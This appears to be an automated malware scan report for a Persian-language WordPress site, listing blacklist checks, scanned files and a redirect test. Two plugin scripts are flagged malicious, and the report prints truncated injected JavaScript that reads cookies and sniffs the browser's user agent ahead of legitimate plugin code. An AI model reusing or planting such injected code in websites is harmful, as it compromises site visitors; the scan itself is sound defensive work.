Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=2sib.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://2sib.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.2sib.com/ | 200 OK Content-Length: 81355 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: itclips.net <!DOCTYPE html>
<html dir="rtl" lang="fa-IR" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8" /> <title>دÙسÛب - اپÙÛÚ©ÛØ´ÙâÙØ§Û Ø¢ÛÙÙ٠٠آÛپد</title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="http://www.2sib.com/xmlrpc.php" /> <!--[if lt ...[4168 bytes skipped]... | ||
http://www.2sib.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: text/javascript | clean |
http://www.2sib.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://www.2sib.com/wp-content/themes/jarida/js/tie-scripts.js?ver=4.0 | 200 OK Content-Length: 65802 Content-Type: text/javascript | clean |
http://hst.tradedoubler.com/file/20649/contextual/cx2.js | 200 OK Content-Length: 11121 Content-Type: application/javascript | clean |
http://www.2sib.com/wp-content/plugins/wp-polls/polls-js.js?ver=2.67 | 200 OK Content-Length: 5244 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo function poll_process_success(b){jQuery(document).ready(function(a){a("#polls-"+poll_id).replaceWith(b);pollsL10n.show_loading&&a("#polls-"+poll_id+"-loading").hide();pollsL10n.show_fading&&a("#polls-"+poll_id).fadeTo("def",1);set_is_being_voted(!1)})}function set_is_being_voted(b){is_being_voted=b}; Antivirus reports:
| ||
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201438 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Sepaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://www.2sib.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.0 | 200 OK Content-Length: 3209 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo return WPGroHo.renderers[key]( data[key], hash, id, key ); } jQuery( '#' + id ).find( 'h4' ).after( jQuery( '<p class="grav-extra ' + key + '" />' ).html( data[key] ) ); } } }, WPGroHo ); jQuery( document ).ready( function() { Gravatar.profile_cb = function( h, d ) { WPGroHo.syncProfileData( h, d ); }; Gravatar.my_hash = WPGroHo.my_hash; Gravatar.init( 'body', '#wpadminbar' ); } ); Antivirus reports:
| ||
http://www.2sib.com/wp-content/plugins/app-store-assistant/js_functions/lightbox/js/lightbox-2.6.min.js | 200 OK Content-Length: 7389 Content-Type: text/javascript | clean |
http://www.2sib.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 4289 Content-Type: text/javascript | clean |
http://www.2sib.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.4 | 200 OK Content-Length: 6521 Content-Type: text/javascript | clean |
http://www.2sib.com/wp-includes/js/jquery/ui/jquery.ui.accordion.min.js?ver=1.10.4 | 200 OK Content-Length: 8366 Content-Type: text/javascript | clean |
http://stats.wp.com/e-201438.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://www.2sib.com/iphone-6-release-date-news-and-rumors/ | 200 OK Content-Length: 84373 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: itclips.net <!DOCTYPE html>
<html dir="rtl" lang="fa-IR" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8" /> <title>Ø¢ÛÙÙÙ Û¶ تارÛØ® عرضÙØ Ø§Ø®Ø¨Ø§Ø± ٠شاÛعات</title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="http://www.2sib.com/xmlrpc.php" /> <meta prop ...[4109 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 2sib.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 2sib.com
Referer: http://www.google.com/search?q=2sib.com
Result:
The result is similar to the first query. There are no suspicious redirects found.